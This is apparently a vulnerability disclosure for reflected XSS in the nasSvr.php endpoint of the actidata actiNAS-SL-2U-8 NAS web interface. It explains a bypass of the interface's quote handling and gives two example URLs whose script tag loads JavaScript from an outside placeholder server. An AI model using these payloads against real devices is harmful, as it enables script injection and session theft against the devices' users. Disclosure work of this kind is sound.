Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.
The web application version 3.2.03-SP1 from actiNAS Plus SL 2U-8 RDX.
Product link: https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx
Eduard Agavriloae
The web application through the endpoint /nasSvr.php is prone to reflected XSS from two query parameters: func and op. In both parameters XSS payloads can be injected that will be rendered on the client inside a message similar to the next ones depending on what parameter was used:
Option <payload> not match in Account Manager!func:<payload> not match in nasSvr!
If the payload has string delimiters such as ' or " and whitespaces between the string delimiters, then the web application will modify the payload by adding the string delimiters before and after the whitespaces, affecting the payload's execution.
However, this can be easily bypassed by directly injecting a script HTML tag with an arbitrary source, essentially allowing you to execute without restrictions JavaScript code. Alternatively, you can just use payloads without whitespaces between string delimiters.
Example payloads:
/nasSvr.php?func=accountMgr&op=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E/nasSvr.php?func=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E
My feeling is that other versions are affected as well, but I didn't found other instances of this product in order to validate.